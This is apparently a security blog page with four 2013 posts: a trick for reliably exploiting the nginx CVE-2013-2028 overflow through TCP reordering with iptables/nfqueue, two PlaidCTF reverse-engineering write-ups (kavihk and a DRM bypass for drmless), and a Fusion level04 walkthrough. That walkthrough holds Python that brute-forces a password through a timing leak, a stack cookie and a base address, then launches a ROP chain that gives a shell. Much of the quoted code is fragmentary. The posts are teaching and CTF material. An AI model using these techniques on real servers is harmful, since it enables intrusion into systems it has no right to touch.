Wednesday, July 24, 2013

Nginx reliable explotation through the internet (CVE-2013-2028)

This vulnerability was published recently (CVE-2013-2028) and it seems that many exploiters got stuck because the socket will not block because the buffer is longer than the standard ethernet MTU, some others have found another attack vector without that problem.

Let me to explain how we have achieved to overcome the non-blocking socket impediment without doing so much:

When packets arriving at the TCP layer are analyzed and once determined the sequence are immediately delivered to the upper layer of the OSI model.

Let's imagine that you want to overflow a big buffer through the network. Normally you would execute something like:

send(sock, "AAAAA….A",…);

If the size of the data is bigger than the MTU, is then splitted into multiple packages. The destination processes the information on many smaller packages instead of one. In summary,a single read()/recv() doesn't get all the data it asked for and the overflow will not happen.

And that's what's happening on ngingx.

What we have done to prevent that packets are delivered directly to the next layer is taking profit of TCP windows and TCP reorder: sending the first data packet on the last place.

What happens is that the TCP stack will not deliver the packets to the next layer because the information is not complete, and just wait until all information (up to the size of the tcp window) is received to deliver it.

Then the application layer will get all the information in _the same_ read and the overflow will happen. 

Using that TCP trick, the size limitation of the overflow is the TCP window size instead the MTU.

One easy and **dirty** way to implement this is using iptables and nfqueue, but there are some better ones:

# iptables -A OUTPUT -p tcp -d ip --destination-port port -j NFQUEUE 
# python 

import nfqueue
import socket
import time

data_count = 0

def cb(dummy, payload): #in some implementations the callback only has one parameter, remove the dummy in that case
        global data_count
        global delayed
        data = payload.get_data()
# DIRTY check for first data packet (not three-way-handshake)
        if len(data) > 60:
                data_count += 1
                if (data_count == 1):
                        print data
# Just DROP the packet and the local TCP stack will send it again because won't get the ACK.
                data_count = 0

q = nfqueue.queue()
except KeyboardInterrupt:
        print "Exiting..."
Albert Puigsech Galicia
+ Mail:
+ Jabber:
+ Twitter: @apuigsech

Saturday, April 27, 2013

PlaidCTF 2013 - kavihk (binary 400) write-up

Here is another PlaidCTF write-up, in this case for a challenge that we didn't solve but had almost finished by the time the CTF ended (except for a couple (mostly stupid) things I'll mention later on). In this case it was kavihk, which was a binary worth 400 points. In the archive we can see both the kavihk binary and the source code it is based on, avih.

Avih "is a roguelike game whose source code fits in exactly 1024 bytes". So as you can imagine, the C code itself looks awful... everything in one line, abusing macro's, etc.

Luckily for us, there is a file named 'avih-commented.c' in the archive, that breaks the code down into pieces that we can more easily digest. Just for giving you a taste of it (you can see the whole thing in the archive), this is what the portion that draws the screen looks like:

  /* draw screen */
   /* determine tile colour */
   /* check for visibility */
   /* memory */
   /* draw */

The code is using ncurses, and presents the user with a mesh filled with monsters, gold, talismans, etc. Now, looking at the binary the first thing we notice is that when the game finishes the following code (I'll call it 'youwin') is executed:

int __cdecl sub_8049581()
  int result; // eax@12
  char dest; // [sp+2Fh] [bp-9h]@2

  while ( (unsigned int)dword_804CB14 <= 0x1D )
    if ( sub_804A1A5((int)&unk_80549C0, 0, 0, &dest, 8) )
    byte_804CAD0[dword_804CB14] ^= dest;
  if ( byte_804CAD5 != '_'
    || byte_804CADB != '_'
    || byte_804CADE != '_'
    || byte_804CAE2 != '_'
    || byte_804CAE7 != '_'
    || byte_804CAED )
    result = (int)"WIN    ...but no flag for you.";
    result = (int)byte_804CAD0;
  return result;

So it seems the buffer at 0x0804CAD0 is actually our (30 bytes long) flag, but it is XORed with something that comes out of the function at 0x0804A1A5. The flag contains a few underscores and ends in a null byte, and this format is used to sanity check the result of the XOR before printing it. If the sanity check doesn't pass, then we are told we won the game, but there is no flag for us :(.

Based on these observations, patching the game to win it won't work. We'll need to reverse further and understand how the XOR key is generated. For this, I tracked cross-references to 'unk_0x80549C0' and found that only three functions use it: the main function, a function that's called in main during initialization, and the function that checks the flag.

I renamed this variable as 'state' so I could easily follow it later on in my idb, and looked at main and compared it to the code we are given:

int __cdecl main()
  char v0; // dl@18
  signed int v1; // eax@23
  int v2; // eax@36
  bool v3; // edx@43
  bool v4; // eax@46

  if ( sub_804A134(&state, 34, 1566) )
  for ( *(_DWORD *)&dword_805C958 = 0; *(_DWORD *)&dword_805C958 <= 7; ++*(_DWORD *)&dword_805C958 )
    init_pair(dword_805C958 + 1, dword_805C958, 0);
  uses_state(); //This function uses 'state' internally
  while ( *(_DWORD *)&dword_805C958 != 27 ) {
  /* ... */

The first function seems to be some initialization, as diving into it shows that it initializes some tables and so on... maybe some cryptographic function? In any case, this is what the function looks like:

signed int __cdecl sub_804A134(void *s, unsigned int a2, int a3)
  signed int result; // eax@2

  if ( a2 + a3 == 1600 )
    if ( a2 && a2 <= 1600 )
      *((_DWORD *)s + 50) = a2;
      *((_DWORD *)s + 51) = a3;
      *((_DWORD *)s + 52) = a2 - 2;
      result = 0;
      result = 1;
    result = 1;
  return result;

I dove into the other two sub-functions, and saw they were initializing some global arrays... but I didn't really attempt to understand them yet. I wanted to get a bigger picture of what is going on before diving into the details. So I called this function 'init_state', noted the 1600 magic (together with the 34 and 1566 passed into it) and went on to the next function.

Now, this function is much bigger, but we see that it passes the state into 'sub_804A1A5' (remember, this is the same function that generated our XOR key) and uses an output from it as a random seed:

int __cdecl uses_state()
  bool v0; // eax@19
  bool v1; // eax@23
  signed int v2; // ebx@36
  int result; // eax@37
  int dest; // [sp+3Ch] [bp-Ch]@7

  if ( sub_804A1A5((int)&state, &dword_80549B0, 32, 0, 0) )
  if ( sub_804A1A5((int)&state, &dword_804CABC, 32, 0, 0) )
  if ( sub_804A1A5((int)&state, &dword_8054AA8, 32, 0, 0) )
  if ( sub_804A1A5((int)&state, 0, 0, &dest, 32) )
  /* ... */

At this point I first followed the actual game logic and compared all variables with the commented avih source code we were given. This allowed me to find out that the values passed to sub_804A1A5 actually contain the current level, the maximum health points our character can have at this moment, and the amount of gold collected so far.

This seems to indicate that we'll have to 'play' one specific game (i.e. collecting the right amount of gold, right amount of talismans at each level) so we can get the key. Before I went on with that, I first wanted to understand what it was that it was using for generating the XOR key... so I dove into sub_804A1A5, which I now call do_sha3.

Going in, after a couple levels of calls, you see this:

int __cdecl sub_804A6CB(int a1)
  char v2; // [sp+18h] [bp-D0h]@1

  sub_80489B5(1, "Input of permutation", a1);
  sub_804A51C(&v2, a1);
  sub_804A603(a1, &v2);
  return sub_80489B5(1, "State after permutation", a1);

Additionally, if you dive into the second call (sub_804A795) you see this code:

int __cdecl sub_804A795(int a1)
  int result; // eax@1
  unsigned int i; // [sp+1Ch] [bp-Ch]@1

  result = sub_80489DE(3, "Same, with lanes as pairs of 32-bit words (bit interleaving)", a1);
  for ( i = 0; i <= 0x17; ++i )
    sub_8048BBE(3, i);
    sub_80489DE(3, "After theta", a1);
    sub_80489DE(3, "After rho", a1);
    sub_80489DE(3, "After pi", a1);
    sub_80489DE(3, "After chi", a1);
    sub_804B175(a1, i);
    result = sub_80489DE(3, "After iota", a1);
  return result;

So at this point I just decided to google for cryptographic functions (I thought it was likely to be a hash) that contained a permutation, lanes and blocks called theta, rho, pi, chi, iota. This search leads very fast to Keccak, or SHA-3 (notice the k's in the same place as the challenge name? :) ).

Good, it seems we have our hash function that will help generate the key. Now we need a bit more reversing to figure out what options we have for the different variables involved. The first one is the game level... this is easy, since we can track the 'youwin' function back to its caller and see under what condition it is called:

    if ( current_level == 9 )
      v2 = youwin();
      v2 = (int)"kavihk";
      "H:%d/%d W:d%d L:%d $%d %s",

So we have levels 0 to 9. In the level initialization function, we find that the level starts at 0 but is increased during initialization. Thus, the level value is 1-8 while we play the game, and is 9 when we have won.

Next, we need to figure out what happens with the gold... so we go back to the initialization function and check cross-references to the gold_collected variable. This brings us to the main loop, where this check is performed:

    if ( dword_804CB20[90 * (a1 + dword_80549B4) + a2 + dword_8054AA0] == '$' )
      gold_collected += current_level;

Ok, this means that each time we find a dollar sign, we will increase our gold by a number equal to the current level. Something similar happens with the max_life_points when finding a talisman:

   if ( dword_804CB20[90 * (a1 + dword_80549B4) + a2 + dword_8054AA0] == tailsman )
      max_health_points += current_level;
      dword_804CB20[a2 + dword_8054AA0 + 90 * (a1 + dword_80549B4)] = empty_space;
    } question: how many dollar signs and how many talisman signs can we find at each level? For this we need to go to the level initialization code again. I reversed this function quite a bit, comparing with the original code, so I knew that there is a function to fill in random empty spots, and an array with elements used to fill in the game grid.

So looking at this code, we find the following:

  player_y = 0;
  for ( b_tmp_var = 0; b_tmp_var <= 8; ++b_tmp_var )
    if ( current_level <= 8 )
      fill_random_position(elems[b_tmp_var]);   // fill objects
  for ( b_tmp_var = 0; ; ++b_tmp_var )
    result = b_tmp_var;
    if ( 2 * current_level <= b_tmp_var )       // 2*level monsters!
    r = rand();
    fill_random_position(r % (7 * current_level / 5) + 'c');// Fill monsters
  return result;

So this shows that we use the 9 initial items of 'elems' to fill in objects for the level. These are the contents of the array:

.data:0804CA80 elems           dd '$'                  ; DATA XREF: init_level+31A r
.data:0804CA80                                         ; main+163 r
.data:0804CA84                 dd '`'
.data:0804CA88                 dd '*'
.data:0804CA8C                 dd '$'
.data:0804CA90                 dd '.'
.data:0804CA94                 dd '@'
.data:0804CA98                 dd '`'
.data:0804CA9C                 dd '>'
.data:0804CAA0                 dd ']'

This tells us that there are two dollar signs and two talismans (the ` sign) in each level. So now we have all the information required to solve the level... except for implementing the proper flavor of SHA3. It turns out this costed me quite some time, and several stupid mistakes were made during that time (yes... after ~40 hours of CTF my mind is not in a very fresh state anymore :( ).

I first downloaded a python reference implementation from the Keccak website... but soon found out that the 34 and 1566 values (rate and capacity) were not supported by it (they had to be multiples of 8). So I moved into the C reference implementation... and found there was A LOT of code and it was very confusing to me at that moment.

So I decided to take 'a shortcut': reuse the implementation in the binary by means of injecting a dynamic library. I created a file implementing a 'start_color' function, which is called near the beginning of the game. From there, I could call the different functions in the game in a loop by means of function pointers. This is how the initial code looked (it is still missing some of the logic, but I don't have it at hand anymore) like:


int (*do_sha3)(void *state,void *in, int insize, void *out, int outsize);

int  start_color(void){
  int current_level=0,max_health_points=18,gold_collected=0;
  int dest;
  char buffer[16]; //This is for the last one
  const char *key = "\\\xf7\x8f/ny\xccy\xdc \x12\x0euj\x89\xd72P\xb2\xd2\xb1\x16\xd9\xe0\xde\xbf?\xf6\x1b\x08";
  // int level;
  do_sha3 = 0x0804A1A5;
  void * sha3_State = 0x080549C0;
    do_sha3(sha3_State, ¤t_level, 32u, 0, 0);
    do_sha3(sha3_State, &max_health_points, 32u, 0, 0);
    do_sha3(sha3_State, &gold_collected, 32u, 0, 0);
    do_sha3(sha3_State, 0, 0, &dest, 32u);
    // current_level++;
    printf("Level: %d = %.8x\n", current_level+1, dest);
  return 0;

From this code, I implemented a brute-forcer to go through the options... but it turned out to be awfully slow (specially within a single-core VM where I couldn't really paralellize anything). This means we need a faster implementation... so I had to dive into the damn Keccak reference code in C.

Now, during the CTF I couldn't find the exact functions that our binary was using, so I used lower level functions and made wrappers around them to look like the ones in the binary. However, I failed at restoring the encrypted flag and also I failed at the number of iterations through the levels.

It turns out that, although there are only 8 levels that the user plays, the level initialization routine is called 9 times. This means that the sha3 over the current_level, max_health_points and gold_collected is performed 9 times, not 8. Yes, in the code above it looks ok. But no, in my bruteforcer I failed to do it and set it to 8 (shame on me!), which is one of the reasons it failed during the CTF.

During the CTF I asked a couple stupid questions to clockish (who created the challenge) to check that I was still relatively sane... when the CTF ended. At this point, he told me I should have used the 'Duplex' functions from Keccak, which are exactly the ones used in the game!

Even then, I had failed at the number of iterations through the loop, and also at memcpy'ing over the global flag (shame on me again! I do too much AES stuff with 16 byte blocks at work, so I used 16 b ytes in the memcpy instead of 30...). Anyway, after the CTF I had some time to fix the problems, and I got to the solution.

The good news is, I was on the right track and had it almost done except for stupid mistakes (if it would have been slightly earlier in the weekend I'm quite confident I'd have finished it). The bad news is we didn't score those 400 points :-/

So in the end, here is the main code that does it:

int main(int ac, char **argv){
    int rate=34;
    int capacity=1600-34;
    uint32_t current_level,max_health_points,gold_collected;
    uint32_t dest=0;
    int i,j,gold,points;
    char *msg;
    const char *key = "\x5c\xf7\x8f\x2f\x6e\x79\xcc\x79\xdc\x20\x12\x0e\x75\x6a\x89\xd7\x32\x50\xb2\xd2\xb1\x16\xd9\xe0\xde\xbf\x3f\xf6\x1b\x08";

    // spongeState   state;
    max_health_points = 0x12;
        printf("[*] i = %d\n" , i);

         //Reinitialize game options
            max_health_points = 18;
            gold_collected = 0;

            //Reinitialize state
            init_state(state, 34, 1566);

            //Obtain current guess
            gold = i;
            points = j;

            //Iterate through the levels, increasing gold and max health depending on current guess
                // printf("%d %d %d\n", current_level, max_health_points, gold_collected);
                do_sha3(state, ¤t_level, 32, 0, 0);
                do_sha3(state, &max_health_points, 32, 0, 0);
                do_sha3(state, &gold_collected, 32, 0, 0);
                do_sha3(state, 0, 0, &dest, 32);
                // printf("Computed hash for level %d: %x\n", current_level+1,dest);
                gold_collected += (gold % 3)*(current_level+1);
                max_health_points += (points%3)*(current_level+1);
                points /= 3;
                gold /= 3;


            do_sha3(state, ¤t_level, 32, 0, 0);
            do_sha3(state, &max_health_points, 32, 0, 0);
            do_sha3(state, &gold_collected, 32, 0, 0);
            do_sha3(state, 0, 0, &dest, 32);

            // printf("\n");
            // exit(-1);
            msg = youwin();
            // printf("msg = %s " , msg);
            if(strcmp(msg,"WIN    ...but no flag for you.")){
                printf("msg = %s \n" , msg);

The rest of the code can be found in this archive. This code comes from the KeccakRefernceAndOptimized distribution, a bit cleaned up so that it only contains my brute-forcer. If you run it starting at offset 2946 you'll see the solution:

sfx@deb64:~/dev/pctf2013/KeccakReferenceAndOptimized$ bin/KeccakOptimized64 2946
[*] i = 2946
msg = b2ute_f0rce_1s_7he_b3st_f0rce 

Although we didn't finish it on time, it was a fun challenge to look at (albeit frustrating because I failed at solving it!)

Friday, April 26, 2013

PlaidCTF 2013 - drmless (binary 250) write-up

One of the challenges I looked at during the last PlaidCTF was 'drmless', and since I didn't see a write-up yet I thought it'd be nice to publish one. Again this is cross-posted on my blog and int3pids blog.
For this challenge, we were provided with a drmless.tgz file containing a few things:
  • .drmlicense : A 16 byte file with some hexadecimal contents
  • cool_story.enc : A 'cool story' encrypted.
  • cooler_story.enc : An even 'cooler story' also encrypted.
  • drmless : an ELF binary.
  • readme.txt : challenge instructions.

If we read the instructions, we see the following text:
Here's a cool story from PPP!
We wrote an even cooler story, but you need to pay
us if you want to unlock it. TEN THOUSAND DOLLAR.
If we run 'drmless cool_story.enc' after extracting the archive on a 32 bit Linux machine we get a nice decrypted file. If we attempt to do the same on the cooler_story.enc file, we are told that this is a binary file and asked whether we want to view it anyway. Sounds like the 'less' program, doesn't it?
So we have a file we can decrypt, and one we cannot. The objective is to decrypt the other one, presumably by altering the drmlicense or bypassing it in some way. Let's look at the binary to find out what's going on.
At startup, the binary loads the .drmlicense file and reads 16 bytes into the 'license' global buffer:
  v2 = getenv("HOME");
  snprintf(&v27, 1024, "%s/.drmlicense", v2);
  v3 = open((const char *)&v27, 0);
  if ( v3 >= 0 || (v3 = open("/.drmlicense", 0), v3 >= 0) || (v3 = open("./.drmlicense", 0), v3 >= 0) )
    read(v3, license, 16);
If we search for cross-referneces to license, we see it is only used in the 'undrm' function, which looks like this:
int __cdecl undrm(int a1)
  int result; // eax@1

  aes_wb_decryptor(a1, a1);
  result = 0;
    *(_BYTE *)(a1 + result) ^= license[result];
  while ( result != 16 );
  return result;
So apparently 'drmless' uses this aes_wb_decryptor function to decrypt the data, and then XORs it with the license. It is interesting to note that only the input buffer is passed to the decryptor, which means that it either uses a hardcoded key or it is stored in some global variable.
Also, it is interesting to note that the name indicates this is probably a whitebox implementation. This means the implementation is obfuscated in an attempt to withstand static/dynamic analysis, and most likely the key is mixed into the algorithm itself in some way.
In any case, I have read documentation on whitebox cryptography before, and also analyzed some implementations of it. Based on that experience, I had some ideas on how to approach a whitebox implementation, but I also knew that I should probably focus on the stuff around the whitebox before diving into the whitebox itself.
Just for fun, I look at the implementation and quickly saw that each round of AES is splitted into several functions, and they are all called sequentially.
.text:0829FF19 loc_829FF19:                            ; CODE XREF: aes_wb_decryptor+7089 j
.text:0829FF19                                         ; aes_wb_decryptor+7094 j ...
.text:0829FF19                 mov     eax, [ebp+var_24]
.text:0829FF1C                 call    r013
.text:0829FF21                 mov     [ebp+var_59], al
.text:0829FF24                 mov     eax, [ebp+var_30]
.text:0829FF27                 call    r020
.text:0829FF2C                 mov     [ebp+var_7B], al
.text:0829FF2F                 mov     eax, [ebp+var_2C]
.text:0829FF32                 call    r021
.text:0829FF37                 mov     [ebp+var_7A], al
.text:0829FF3A                 mov     eax, [ebp+var_28]
.text:0829FF3D                 call    r022
.text:0829FF42                 mov     [ebp+var_79], al
.text:0829FF45                 mov     eax, [ebp+var_24]
.text:0829FF48                 call    r023
.text:0829FF4D                 mov     [ebp+var_78], al
.text:0829FF50                 mov     eax, [ebp+var_30]
.text:0829FF53                 call    r030
I also saw no global key seems to be input to the algorithm, so I started treating it as a decryption oracle and turned into the more interesting XOR with the license and its possible implications.
The first thing I did was looking for cross-refs to 'undrm'. I found it is used in the 'drmprotected' function to decide whether a file is DRM-protected or not:
signed int __cdecl drmprotected(int a1)
  int v1; // ebx@4
  int v2; // eax@5
  char v4[16]; // [sp+10h] [bp-48h]@4
  char v5; // [sp+20h] [bp-38h]@4
  char v6; // [sp+30h] [bp-28h]@4
  char v7; // [sp+40h] [bp-18h]@4

  if ( !old_bin_file(a1) || !seekable(a1) || lseek(a1, 0, 0) == -1 )
    return 0;
  v1 = read(a1, v4, 64);
  if ( v1 > 0 )
    v2 = 0;
    if ( v4[0] < 0 )
      return 0;
    while ( 1 )
      if ( v1 <= v2 )
      if ( v4[v2] < 0 )
        return 0;
  return 1;
This just decrypts the first 64 bytes of a file and performs some checks on it. If the checks pass, the function returns 1, otherwise it returns 0. At this point I strongly suspected this was all the protection that was to be found. So I decided to set my drm license to all-zeros, force the 'drmprotected' function to return 1 and dump the data into a file.
I did this using this vtrace script and running it with the cool and the cooler story. The script still requires you to go through the whole output by pressing 'space' until reaching the end, in the same way you'd navigate through a file with 'less'.
sfx@deb:~/drmless/$ python cool_story.enc cool_story.dec
sfx@deb:~/drmless/$ python cooler_story.enc cooler_story.dec
After this, I used xortool from Hellman to analyze the output files. When run with the 'cool story' it lead to the original .drmlicense contents... so I ran it against the cooler story and used the resulting key to decrypt the output:
sfx@deb:~/drmless/xortool-master$ python -l 16 ../cool_story.dec -c 20
1 possible key(s) of length 16:
Found 1 plaintexts with 95.0%+ printable characters
See files filename-key.csv, filename-char_used-perc_printable.csv
sfx@deb:~/drmless/xortool-master$ python -l 16 ../cooler_story.dec -c 20
1 possible key(s) of length 16:
Found 1 plaintexts with 95.0%+ printable characters
See files filename-key.csv, filename-char_used-perc_printable.csv
sfx@deb:~/drmless/xortool-master$ cd ...
bash: cd: ...: No such file or directory
sfx@deb:~/drmless/xortool-master$ ls  args.pyc  colors.pyc  libcolors.pyc  routine.pyc  tests  xortool_out
sfx@deb:~/drmless/xortool-master$ cd ..
sfx@deb:~/drmless$ ls
cooler_story.dec  cool_story.dec  drmless  story.dec  util.pyc
cooler_story.enc  cool_story.enc  readme.txt    xortool-master
sfx@deb:~/drmless$ python
Python 2.7.3 (default, Mar  5 2013, 01:19:40) 
[GCC 4.7.2] on linux2
Type "help", "copyright", "credits" or "license" for more information.
>>> import util
>>> x = open('cooler_story.dec').read()
>>> key = "\xfe\xed\xa1\x07\x0f\xf0\rp\xde\xad\xbe\xef\xfa\xceUU"
>>> y = util.repxor(x,key)
>>> y[:100]
'TWELFTH NIGHT; OR, WHAT YOU WILL\r\n\r\nby PPP\r\n"freeShakespeare_downWithDRM"\r\n\r\n\r\n\r\nPERSONS REPRESENTED'

The key is: freeShakespeare_downWithDRM
So here it is, 250 points :)

Wednesday, March 13, 2013

Fusion 04 exploit write-up

Last week I started playing with the exploit exercises from the Fusion VM at The first level was a straightforward stack overflow without any mitigations. Next came one with ASLR for the stack, which was easy to bypass with a simple jmp *esp found in the main binary. Next level up added NX, so I had to resort to ROP, which was also simple by using ROPGadget to generate a payload based off libc (and fixing up the chain due to a bug in ROPGadget 3.3).

Now, level04 was slightly more difficult. It is a web server compiled with stack cookies (SSP), position independent code (PIC/PIE) and configured to run with ALSR and NX. So this gives us a few protections we need to bypass or work around somehow.

Because of this, I thought it was interesting to share and maybe request some feedback... who knows, maybe there are easier solutions and I am just complicating my life :) You can also find a copy of this post at my personal blog

Additionally, the web server generates a random password which you need to provide in order to hit the vulnerability and control the instruction pointer. Looking at the validate_credentials function, we see this code:

int validate_credentials(char *line)
  char *p, *pw;
  unsigned char details[2048];
  int bytes_wrong;
  int l;
  struct timeval tv;
  int output_len;

  memset(details, 0, sizeof(details));

  output_len = sizeof(details);

  p = strchr(line, '\n');
  if(p) *p = 0;
  p = strchr(line, '\r');
  if(p) *p = 0;

  // printf("%d\n", strlen(line));
  base64_decode(line, strlen(line), details, &output_len);
  // printf("%s -> %s\n", line, details);
  // fflush(stdout);
  p = strchr(details, ':');
  pw = (p == NULL) ? (char *)details : p + 1;

  for(bytes_wrong = 0, l = 0; pw[l] && l < password_size; l++) {
    if(pw[l] != password[l]) {
#if 0
      char *buf;
      asprintf(&buf, "[%d] wrong byte (%02x vs %02x)\n", l,
                          password[l], pw[l]);
      write(58, buf, strlen(buf));

  // anti bruteforce mechanism. good luck ;>
  tv.tv_sec = 0;
  tv.tv_usec = 2500 * bytes_wrong;

  select(0, NULL, NULL, NULL, &tv);

  // printf("%d bytes wrong!\n", bytes_wrong);

  if(l < password_size || bytes_wrong) 
    send_error(401, "Unauthorized", 
    "WWW-Authenticate: Basic realm=\"stack06\"",

  return 1;
So there is a clear timing leak on line 208 which tells you how many bytes were wrong. Additionally, the base64_decode function seems to take the length of the output buffer but then this is what it does with it:

void base64_decode(const char *data,
                    size_t input_length,
                    unsigned char *output,
                    size_t *output_length) {

    if (decoding_table == NULL) build_decoding_table();

    // printf("data: %p, input_length: %d, output: %p, output_length: %p\n",
    // data, input_length, output, output_length);

    if ((input_length % 4) != 0) {
  // printf("len % 4 = fail\n");

    *output_length = input_length / 4 * 3;
So, it just overwrites it with the computed output buffer and goes ahead and decodes it. Thus, we have a stack based buffer overflow but in order to exploit it we first need to recover the random password so that the function returns and uses the pops the return address off the stack.

Discovering the password is fairly easy thanks to the timing leak: we just brute force byte by byte, measuring the time to see if we found the right character or not. In my case, the timing difference is below 0.001 when we hit a good value and above it when we do not, so I just check for that:

def check_password(s, password):
 req = "GET / HTTP/1.0\r\nAuthorization: Basic %s\r\n\r\n" % base64.b64encode("stack06:"+password)
 resp = ""
 resp = resp + s.recv(1024)
 auth = "Unauthorized" not in resp
 return (auth, resp)

# First find auth password
def find_next_char(password):
 done = False
 for current_char in string.ascii_letters+string.digits:
  s =  get_connection(ip,port)

  t0 = time.time()
  found,resp = check_password(s, password+current_char)
  t1 = time.time()

  #If found or time indicates current char is good...
  if found or (t1-t0) < 0.001:
   print "[*] Found character %d = %s" %(len(password)+1,current_char)
   return (found,password+current_char)

 return (False,password)

def find_password():
 password = ""
 found = False
 while(not found) and len(password)<16:
  (found,password) = find_next_char(password)
 return password
So this piece will find us the password. What's next? Well, we can use this to overwrite some data and hopefully hijack EIP. But... as I mentioned above, there is a catch: there is a stack cookie protecting EIP.

Since we can feed any binary data of any size (thanks base64 decode :) ), we can brute force the stack cookie byte by byte. When we see a stack corruption, we guessed an incorrect value. When the program goes on normally, we hit the right result. Again, this is the code implementing that part:

def find_cookie(password,cookie = ""):
 while len(cookie)!=4:
  for i in xrange(256):
   # print "[*] Test ", i
   s = get_connection(ip,port)
   found,resp = check_password(s,password + "A"*2024+ cookie + chr(i))
   if "smashing" not in resp:
    # print resp
    cookie = cookie + chr(i)
    print "[*] Cookie value is 0x%s" % cookie.encode("hex")
    print resp
 return cookie
At this point, we can reliably set EIP since we know the stack cookie value. However, that's not very helpful since everything is randomized thanks to full ASLR and a PIC binary. The first thing I tried here was overwriting the last byte of the saved EIP to land on a call to printf() or some other function returning data. This would help me obtain some data from the stack, and then I could create a ROP payload based on the leaked data.

However, then I hit another problem: ebx is used by the code to contain a reference to the binary loading address + some offset. This is done to achieve position independent code. Unfortunately, the exploit also overwrites ebx, which was stored by validate_credentials just between the stack cookie and the return address.

So what I did next was guessing ebx in the same way I did for the stack cookie. However, here I started with the known last byte (the lowest 12 bits of the binary are not randomized) and brute forced the rest. Again, the code is very similar to the previous one:

def find_ebx(password,cookie):
 ebx = ""
 s = get_connection(ip,port)
 found,base_resp = check_password(s,password + "A"*2024+ cookie + "AAAA"*3)
 while len(ebx)<4:
  for i in xrange(0,256):
    s = get_connection(ip,port)
    found,resp = check_password(s,password + "A"*2024+ cookie + "AAAA"*3 + ebx + chr(i) )
    if resp == base_resp:
     ebx = ebx + chr(i)
     print "[*] ebx value is 0x%s" % ebx[::-1].encode("hex")
   except socket.error:
    # print "[*] Fail"
  if i==255:
   print "[*] Could not discover ebx value. Exploit failed."
 return ebx
This code first obtains a 'normal response'. Next, it starts bruteforcing ebx byte by byte, comparing the response with the 'expected response'. If it matches, the right value was found, else it iterates to the next candidate.

Now, with this done we are able to compute the base for the binary by subtracting 0x4118 from the leaked ebx value. After finishing the exploit I realized that this was actually not needed, since the stack smashing detection code prints out a very helpful memory map into stderr, which is redirected to our socket. Anyway, with this code the exploit doesn't rely on that leak so it would work even if stderr is not redirected to our socket.

At this point I had two options: use this to leak the libc or make a ROP payload based on the binary. Since I already had a payload for libc made with help of ROPGadget (which I had to correct due to some bug by the way), I decided to return into write and leak the first GOT entry to obtain the libc base. Therefore, the final stages of my exploit look like this:

base = struct.unpack("<I", ebx)[0] - 0x22FF - 0x1E19
write_plt = struct.pack("<I",base + 0xF30 ) #write PLT entry
got_base = struct.pack("<I",base + 0x4124 ) # GOT start

print "[*] Binary base: 0x%.8x . Leaking libc base" % base
print "[*] PLT entry for printf @ ", write_plt[::-1].encode('hex')
print "[*] GOT start @ ", got_base[::-1].encode("hex")

s =  get_connection(ip,port)
found,resp = check_password(s,password + "A"*2024+ cookie + "AAAA"*3 + ebx + "AAAA"*3 + write_plt + "AAAA" + "\x01\x00\x00\x00" + got_base + "\x04\x00\x00\x00")
libc = struct.unpack("<I", resp[:4])[0] - 0xd3a70
print "[*] Discovered libc base: 0x%.8x" % libc 

print "[*] Launching ROP exploit"
p = get_rop(libc)
s =  get_connection(ip,port)
found,resp = check_password(s,password + "A"*2024+ cookie + "AAAA"*7 + p)
After this, a nice shell is running for us. With only one catch: an alarm is set by the webserver, and it will trigger a SIGALRM signal soon. So what I do is just executing trap '' SIGALRM; as a first command so that the signal is ignored. The full exploit code is here for you to play with :)


Even in the presence of quite some countermeasures (fully randomized addres space, non-executable data areas, stack smash protection), it is still possible to achieve reliable code execution.

In this case, we have abused the fact that the vulnerable server does not call execve() for every new child to brute-force the stack cookie and also to discover the base address of the executable itself. After this is done, it is basically game over.

However, these techniques have two requirements: the address space has to remain constant between requests (albeit random every time we restart the whole server) and we need to be able to partially corrupt the data with fully arbitrary values. If these requirements were not met, another info-leak bug would have been required in order to obtain this data.

Thus, as an application programmer it is always recommended to call fork()+execve() instead of just fork(), so that the OS re-randomizes the whole address space.